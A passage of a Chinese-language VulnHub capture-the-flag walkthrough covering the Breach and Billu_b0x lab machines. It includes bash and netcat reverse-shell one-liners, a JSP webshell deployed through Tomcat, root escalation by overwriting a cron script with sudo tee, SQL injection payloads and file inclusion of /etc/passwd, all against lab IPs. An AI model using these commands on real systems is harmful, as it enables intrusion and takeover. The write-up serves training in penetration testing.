src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 點擊initech.html左邊的<code>Employee portal</code>進入到<code>http://192.168.110.140/impresscms/user.php</code> 這是一個impresscms登錄頁</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>使用之前兩次base64解碼得到的密碼登錄impresscms:</p><p>用戶名:<code>pgibbons</code></p><p>密碼:<code>damnitfeel$goodtobeagang$ta</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/7.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) exploit-db.com查找impress cms漏洞:發現ImpressCMS 1.3.9 SQL注入漏洞:<code>https://www.exploit-db.com/exploits/39737/</code>,可注入頁面為<code>/modules/profile/admin/field.php</code>,但是該頁面目前沒有權限訪問,無法進行注入。</p><p>(4) 注意左邊的收件箱Inbox顯示有3封郵件,依次打開看:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>第1封郵件,主要內容:讓你的團隊只能向管理門戶發布任何敏感的內容。我的密碼非常安全,發自ImpressCMS Admin Bill。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/9.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>第2封郵件,主要內容:Michael采購了IDS/IPS。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/10.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>第3封郵件,主要內容:有一個peter的SSL證書被保存在192.168.110.140/.keystore。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/11.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>(5) 訪問<code>http://192.168.110.140/.keystore</code>下載包含SSL證書的密鑰庫keystore文件,keystore是存儲公私密鑰的一種文件格式。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/12.jpg' alt='' referrerPolicy='no-referrer' /> </p><h3><a name='header-n7127' class='md-header-anchor '></a>0x03:導入流量抓包文件、SSL證書到Wireshark</h3><p>(1) 依次訪問左邊的菜單樹,點擊每個菜單欄:</p><p>content鏈接了一張圖片troll.gif:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/13.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>點擊profile會進入目錄瀏覽:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/14.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>但都沒發現可利用漏洞,繼續瀏覽每個網頁。</p><p>(2) 點擊<code>View Account</code>菜單進入界面,再依次點擊頁面的<code>Content</code>,會彈出一行鏈接<code>Content SSL implementation test capture</code>,點擊鏈接,如下圖:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/15.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>(3) 進入<code>http://192.168.110.140/impresscms/modules/content/content.php?content_id=1</code>頁面,可以看到一個名為:<code>_SSL_test_phase1.pcap</code>的Wireshark流量包文件,下載它。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/16.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>同時,該頁面有重要的提示信息:這個pCAP文件是有紅色團隊的重新攻擊產生的,但是不能讀取文件。而且<code>They told me the alias, storepassword and keypassword are all set to 'tomcat'</code>別名、Keystore密碼、key密碼都設置成<code>tomcat</code>。</p><p>由此推測:a.這是一個流量包文件,不能讀取很可能因為某些流量有SSL加密(前面的郵件中提供了一個keystore,這里提供了密碼;b.系統中可能存在tomcat。</p><p>(4) Windows攻擊機安裝有JDK,到JDK目錄下找到keytool.exe工具:路徑<code>C:\Program Files\Java\jre1.8.0_121\bin\keytool.exe</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>將keystore放到C盤根目錄,查看keystore這個密鑰庫里面的所有證書,命令<code>keytool -list -keystore c:\keystore</code> 輸入密鑰庫口令tomcat:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) 從密鑰庫導出.p12證書,將keystore拷貝到keytool目錄,導出名為:tomcatkeystore.p12的證書,命令:</p><p>keytool -importkeystore -srckeystore c:\keystore -destkeystore c:\tomcatkeystore.p12 -deststoretype PKCS12 -srcalias tomcat</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/19.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/20.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(6) 將.p12證書導入Wireshark</p><p>.p12證書存儲在C盤根目錄,將證書導入Wireshark:在Wireshark中打開<code>_SSL_test_phase1.pcap</code>流量包文件,選擇菜單:編輯--首選項--Protocols--SSL,點擊右邊的Edit:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/21.jpg' alt='' referrerPolicy='no-referrer' /></p><p>輸入:192.168.110.140 8443 http 點擊選擇證書文件 輸入密碼tomcat</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/22.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7178' class='md-header-anchor '></a>0x04:從流量包文件中得到tomcat后台URL和密碼</h3><p>(1) 導入證書后,https流量已經被解密,查看每個http流量包:</p><p>發現從192.168.110.129到192.168.110.140的攻擊流量包,其中有cmd命令馬執行了id命令,攻擊者上傳了兩張圖片,疑似圖片馬,但是命令馬無法直接訪問,需要登錄tomcat后台:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/23.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 獲得Tomcat后台登錄地址和用戶名密碼</p><p>繼續觀察流量包,發現一個Unauthorized的認證包,該request和response包含了Tomcat后台的登錄地址:<code>https://192.168.110.140:8443/_M@nag3Me/html</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/24.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現包含登錄用戶名密碼的數據包, 采用http basic認證,認證數據包為:<code>Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/25.jpg' alt='' referrerPolicy='no-referrer' /></p><p>這是base64編碼的用戶名密碼,將<code>dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC</code>復制到Burpsuit Decoder進行解碼,得到Tomcat登錄用戶名密碼</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/26.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Tomcat后台登錄用戶名:tomcat,密碼:Tt\5D8F(#!*u=G)4m7zB</p><h2><a name='header-n7201' class='md-header-anchor '></a>獲取shell</h2><h3><a name='header-n7202' class='md-header-anchor '></a>0x05: 登錄Tomcat后台get shell</h3><p>(1) 登錄tomcat后台:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/27.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/28.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Tomcat后台get shell是有標准姿勢的,上養馬場,准備好jsp版本的各種馬,這里有cmd命令小馬,菜刀馬,jspspy大馬,將其打成caidao.zip壓縮包,再將zip壓縮包將擴展名改為caidao.war,將war包上傳部署即可:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/29.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 在WAR file to deploy中將war包上傳:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/30.jpg' alt='' referrerPolicy='no-referrer' /></p><p>上傳后在目錄中找到上傳的目錄/caidao,已上傳jsp木馬文件就在這個目錄下。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/31.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 使用中國菜刀連接<code>https://192.168.110.140:8443/caidao/caidao.jsp</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/32.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) 使用菜刀命令行連接,執行id;pwd命令成功:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/33.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) 發現的問題:上傳的菜刀馬,一會兒就會消失,文件被刪除,需要重新上傳war包才能夠繼續使用菜刀,主機可能有殺軟或者殺web shell工具。解決方法:bash反彈一個shell出來。</p><h2><a name='header-n7231' class='md-header-anchor '></a>提升權限</h2><h3><a name='header-n7232' class='md-header-anchor '></a>0x06: 查看系統用戶,發現mysql root密碼</h3><p>(1) 查看當前系統用戶,找id為1000以后的用戶 cat /etc/passwd</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/34.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現兩個值得關注的用戶:milton 和 blumbergh</p><p>(2) 在菜刀里面找到網頁根目錄,默認是在tomcat目錄,找到網頁部署目錄<code>/var/www/5446/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/35.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 該目錄下發現兩個奇怪的php文件,命名非常長且無規律fe4db1f7bc038d60776dcb66ab3404d5.php和0d93f85c5061c44cdffeb8381b2772fd.php,使用菜刀下載下來打開查看:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/36.jpg' alt='' referrerPolicy='no-referrer' /></p><p>這是mysql數據庫連接文件,使用mysql的root賬號連接數據庫,密碼為空。</p><p>(4) 因為菜刀馬總是被刪除,所以反彈shell到nc:在菜刀cmd命令行反彈一個shell到Windows攻擊機的nc,命令:<code>echo "bash -i >& /dev/tcp/192.168.110.220/4444 0>&1" | bash</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/37.jpg' alt='' referrerPolicy='no-referrer' /></p><p>nc接收反彈sehll成功:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/38.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) 連接mysql數據庫,查看mysql用戶,這里輸入mysql命令后一直沒有回顯,直到輸入exit退出mysql登錄后,查詢回顯才出來,命令:</p><p><code>mysql -u root -p</code></p><p><code>use mysql;</code></p><p><code>select user,password from user;</code></p><p><code>exit</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/39.jpg' alt='' referrerPolicy='no-referrer' /></p><p>得到milton用戶的密碼哈希:<code>6450d89bd3aff1d893b85d3ad65d2ec2</code></p><p>到<code>https://www.somd5.com/</code>解密,得到用戶milton的明文密碼:thelaststraw</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/40.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7275' class='md-header-anchor '></a>0x07: 提權到用戶milton和blumbergh</h3><p>(1) 無法執行su命令,顯示需要一個終端,之前都遇到這個問題,通過Python解決:</p><p><code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/41.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 提權到用戶milton</p><p><code>su - milton</code>  密碼:thelaststraw</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/42.jpg' alt='' referrerPolicy='no-referrer' /></p><p> 查看milton用戶home目錄下的some_script.sh文件,沒有可利用的信息。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/43.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 查看系統內核版本,命令<code>uanme -a</code>和<code>cat /etc/issue</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/44.jpg' alt='' referrerPolicy='no-referrer' /></p><p>系統內核版本為:Linux Breach 4.2.0-27-generic,不存在Ubuntu本地提權漏洞。存在本地提權漏洞內核版本是:Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04)</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/45.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) 查看歷史命令,無有價值的線索,看到歷史命令su提權到了blumbergh用戶。需要找到blumbergh用戶的密碼。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/46.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) 到現在發現了7張圖片,6張在圖片目錄:<code>http://192.168.110.140/images/</code>,1張在milton用戶目錄下:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/47.jpg' alt='' referrerPolicy='no-referrer' /></p><p><code>http://192.168.110.140/images/bill.png</code></p><p><code>http://192.168.110.140/images/initech.jpg</code></p><p><code>http://192.168.110.140/images/troll.gif</code></p><p><code>http://192.168.110.140/images/cake.jpg</code></p><p><code>http://192.168.110.140/images/swingline.jpg</code></p><p><code>http://192.168.110.140/images/milton_beach.jpg</code></p><p><code>milton用戶目錄下my_badge.jpg</code></p><p>將圖片復制到kali linux,使用strings打印各圖片其中的可打印字符,追加輸出到images.txt,在vim下查看,密碼在bill.png圖片中。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/48.jpg' alt='' referrerPolicy='no-referrer' /></p><p>找到可能的密碼或提示:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/49.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現唯一的單詞是:<code>coffeestains</code></p><p>或者使用exiftool.exe工具查看bill.png圖片的exif信息,得到可能的密碼:<code>coffeestains</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/50.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(6)提權到blumbergh用戶</p><p>用戶名:blumbergh <br/></p><p>密碼:coffeestains</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/51.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(7)查看歷史命令,發現/usr/share/cleanup和tidyup.sh腳本文件:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/52.jpg' alt='' referrerPolicy='no-referrer' /></p><p>讀取tidyup.sh腳本分析:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/53.jpg' alt='' referrerPolicy='no-referrer' /></p><p><code>cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf</code></p><p>這是一段清理腳本,描述中說明每3分鍾執行清理,刪除webapps目錄下的文件,因此之前上傳的菜刀馬總是被刪除,需要重新上傳。</p><p>查看tidyup.sh的權限,對該腳本沒有寫入權限,只有root可以</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/54.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看sudo權限,執行sudo -l:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/55.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現用戶能夠以root權限執行這tee程序或tidyup.sh腳本:/usr/bin/tee和/usr/share/cleanup/tidyup.sh</p><p>tee命令用於讀取標准輸入的數據,並將其內容輸出成文件。tidyup.sh是清理腳本。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/56.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7370' class='md-header-anchor '></a>0x07:反彈root權限shell,獲取flag</h3><p>(1) 向tidyup.sh中寫入反彈shell命令</p><p>tidyup.sh文件只有root可寫,而能夠以root權限運行tee命令,那么用tee命令寫tidyup.sh:先將反彈shell命令寫入shell.txt文件,使用bash反彈shell命令沒有成功,於是使用nc命令反彈shell成功,所以寫nc反彈命令:</p><p><code>echo "nc -e /bin/bash 192.168.110.220 5555" > shell.txt</code></p><p>再使用tee命令將shell.txt內容輸出到tidyup.sh</p><p><code>cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh</code></p><p>查看tidyup.sh文件寫入成功:</p><p><code>cat /usr/share/cleanup/tidyup.sh</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/57.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) nc監聽等待反彈shell,查看權限是root,flag是一張圖片,將圖片拷貝到home目錄:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/58.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 查看一下crontab計划任務,發現果然有每3分鍾執行tidyup.sh清理腳本的任務:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/59.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) 使用之前上傳的jsp大馬JspSpy將flair.jpg下載到Windows:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/60.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) 查看flag:<code>I NEED TO TALK ABOUT YOUR FLAIR</code> 游戲通關。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/61.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7403' class='md-header-anchor '></a>思路總結</h2><h3><a name='header-n7404' class='md-header-anchor '></a>主要突破點</h3><p>(1) 從網頁源碼和圖片字符中解密出CMS和Tomcat的賬號、密碼。</p><p>(2) 導入ssl證書到Wireshark中解密經過SSL加密的流量,獲得Tomcat后台登錄URL和賬號密碼。</p><p>(3) Tomcat后台get shell姿勢要熟練。</p><p>(4) 提權:找到兩個賬號的密碼,發現可以root權限執行的tee命令和tidyup.sh清理腳本,通過計划任務反彈root shell。</p><h3><a name='header-n7413' class='md-header-anchor '></a>難點和踩到的坑</h3><p>(1) 使用keytool導出SSL證書:這是非常規滲透知識,需要查閱原理和工具使用,耗費時間較多。</p><p>(2) Tomcat后台get shell后,已上傳的菜刀馬總是被殺,每次傳上去過不了幾分鍾沒了,當時以為該系統安裝了殺毒軟件或web shell清理工具,實際是因為主機tidyup.sh清理腳本,每3分鍾清理一次。反彈出一個shell就可以持續使用shell了。</p><p>(3) 連接mysql執行命令,沒有回顯。菜刀執行命令超時,nc中只有exit退出時才回顯,當時打算放棄了,才exit退出,結果退出才有回顯,發現了milton賬號的密碼哈希。山重水復疑無路,柳暗花明又一村。</p><p>(4) 花費較多時間進行兩次賬號切換,再反彈root shell提權。發現和利用tidyup.sh需要較多時間。</p><p>(5) 通過crontab的計划任務,反彈root shell的方式,在真實滲透測試中是常見的,比如redis的root空口令挖礦,可以ssh證書連接,也可以寫root crontab反彈,但是在Vulnhub中第一次遇到,對初學者有難度。</p><h1><a name='header-n7424' class='md-header-anchor '></a>第二節 Billu_b0x</h1><h2><a name='header-n7425' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n7426' class='md-header-anchor '></a>下載鏈接</h3><p><a href='https://download.vulnhub.com/billu/Billu_b0x.zip' target='_blank' class='url'>https://download.vulnhub.com/billu/Billu_b0x.zip</a></p><h3><a name='header-n7429' class='md-header-anchor '></a>靶機說明</h3><p>虛擬機難度中等,使用ubuntu(32位),其他軟件包有: </p><ul><li>PHP</li><li>apache</li><li>MySQL</li></ul><h3><a name='header-n7442' class='md-header-anchor '></a>目標</h3><p>Boot to root:從Web應用程序進入虛擬機,並獲得root權限。</p><h3><a name='header-n7445' class='md-header-anchor '></a>運行環境</h3><ul><li>靶機:使用VMWare打開虛機,網絡連接方式設置為net,靶機自動獲取IP。</li><li>攻擊機:同網段下有Windows攻擊機,安裝有Nmap、Burpsuit、Sqlmap、nc、Python2.7、DirBuster、AWVS、Nessus等滲透工具,kali攻擊機,主要用Windows攻擊機完成實驗。</li></ul><h2><a name='header-n7453' class='md-header-anchor '></a>信息收集</h2><ul><li>ip發現</li></ul><p>啟動Billu_b0x虛擬機,由於虛機網絡設置為net模式,使用Nmap掃描VMware Network Adapter VMnet8網卡的NAT網段C段IP,即可找到虛機IP,命令:</p><p><code>nmap -sP 192.168.64.1/24</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>獲得靶機ip <code>192.168.64.161</code></p><ul><li>端口和服務識別</li></ul><p>使用nmap掃描1-65535全端口,並做服務識別和深度掃描(加-A參數),掃描結果保存到txt文件,命令:</p><p><code>nmap -p1-65535 -A 192.168.64.161 -oN billu.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/2.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現目標主機端口和服務如下:</p><p>端口         協議        后端服務</p><p>TCP 22      SSH        OpenSSH 5.9p1</p><p>TCP 80      HTTP       Apache httpd 2.2.22     <br/></p><p>進入web首頁:發現用戶名口令輸入框,並提示“Show me your SQLI skills”。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/3.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7488' class='md-header-anchor '></a>漏洞挖掘</h2><ul><li>漏洞挖掘思路:</li></ul><p>(1) SQL注入:首頁提示注入,想辦法注入成功。</p><p>(2) 暴破目錄:用DirBuster暴破,看是否有新網頁,找新漏洞;</p><p>(3) 漏洞掃描:暴破的新網頁,送進AWVS或APPScan掃漏洞;</p><p>(4) 手動挖掘:暴破的新頁面,通過Firefox掛burp代理,在burp中觀察Request和Response包,手動找漏洞;</p><p>(5) 查看每個網頁的源碼,看是否有提示;。</p><p>(6) 如得到用戶名,密碼,嘗試登錄ssh,如能連接上,無需反彈shell了。</p><ul><li>步驟1:測試首頁SQL注入</li></ul><p>(1) 在用戶名輸入框輸入<code>admin' or 'a'='a --</code> 密碼隨意,發現無法注入,出現js彈框Try again:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 使用sqlmap進行post注入測試,命令:</p><p>sqlmap.py -u “<a href='http://192.168.64.161' target='_blank' class='url'>http://192.168.64.161</a>” --data "un=admin&ps=admin&login=let%27s+login" --level 3 --dbms mysql</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>sqlmap注入檢測完成,結果無法注入,目前不知道系統對注入的過濾規則是什么,使用幾個sqlmap的tamper測試也未成功。暫時先不fuzz注入,看看暴破目錄。</p><ul><li>步驟2:windows使用DirBuster暴破目錄,同時使用kali Linux的dirb暴破,為得到更多的暴破結果,並減少暴破時間:</li></ul><p>得到頁面較多,test.php、add.php、in.php、c.php、index.php、show.php等,目錄有:uploaded_images,phpmy依次訪問:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/6.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/7.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟3:利用文件包含漏洞獲取php源碼、passwd文件</li></ul><p>(1) 訪問test.php:頁面提示file參數為空,需要提供file參數</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>測試文件包含:<code>http://192.168.64.161?file=/etc/passwd</code> 發現無法包含,跳轉會首頁。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 在Firefox的Hackbar或者Brupsuit中,將get請求,變更為post請求,文件包含成功,獲得passwd文件。</p><p>使用hackerbar post數據,可下載passwd文件:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>使用burpsuit中選擇Change request method,將get請求轉換為post請求,獲得passwd文件成功:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/11.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 通過同樣文件包含的方法,下載add.php、in.php、c.php、index.php、show.php、panel.php等文件,后面可以訪問文件的同時,審計文件的源代碼。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) 查看passwd文件,發現1個id 1000的賬號ica,ssh連接的用戶名可以是ica或root:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/14.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟4:訪問add.php、in.php頁面和審計代碼</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/15.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>add.php是一個上傳界面,但是功能無法使用,查看源碼文件發現只是個頁面,沒有后台處理代碼。in.php是php info信息。</p><ul><li>步驟5:查看c.php源碼</li></ul><p>這是數據庫連接文件,發現mysql連接用戶名密碼:</p><p>用戶名:billu</p><p>密碼:b0x_billu</p><p>數據庫名:ica_lab</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/17.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟6:通過得到的mysql密碼登錄phpmyadmin失敗</li></ul><p>(1) 通過dirb暴破出/phpmy目錄,訪問該目錄到phpmyadmin登錄頁面:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/18.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>使用mysql密碼嘗試登錄phpmyadmin:可是無法登錄。目前得到一個ssh用戶是ica,mysql連接賬號billu和密碼b0x_billu,嘗試登錄ssh和phpmyadmin都失敗。</p><p>目前SQL注入繞過沒有成功,得到的mysql連接密碼無法登錄phpmyadmin。</p><p>初步推測虛擬機故障:mysql沒有正常啟動,稍后打算單用戶模式進入Ubuntu排查。</p><ul><li>步驟7:繼續暴破phpmy目錄,文件包含phpmyadmin配置文件</li></ul><p>(1) phpmyadmin的默認的配置文件是:config.inc.php。需要猜測路徑,通過URL猜測路徑默認在/var/www/phpmy下面。</p><p>(2) 在火狐瀏覽器的Hackbar或者Burpsuit中,通過文件包含,讀取config.inc.php文件,Hackbar的獲取方法:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/19.jpg' alt='' referrerPolicy='no-referrer' /> </p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/20.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>在配置文件中發現root密碼:roottoor</p><p>(3) Burpsuit的獲取方法:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/21.jpg' alt='' referrerPolicy='no-referrer' /> </p><ul><li>步驟8:使用xshell ssh登錄root賬號,完成實驗</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/22.jpg' alt='' referrerPolicy='no-referrer' /> </p><ul><li>步驟9:排查mysql故障</li></ul><p>至此已經獲得root權限,但是之前的phpmyadmin無法登錄問題,懷疑mysql故障,root登錄后,查看mysql狀態為:mysql stop/waiting,推測mysql被之前的高線程目錄暴破、掃描導致故障,嘗試重啟mysql失敗,決定重新安裝虛擬機。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/23.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>虛機重新安裝后,ssh登錄,查看mysql運行狀態正常,但是新虛機的IP變成:192.168.64.162。</p><p><img 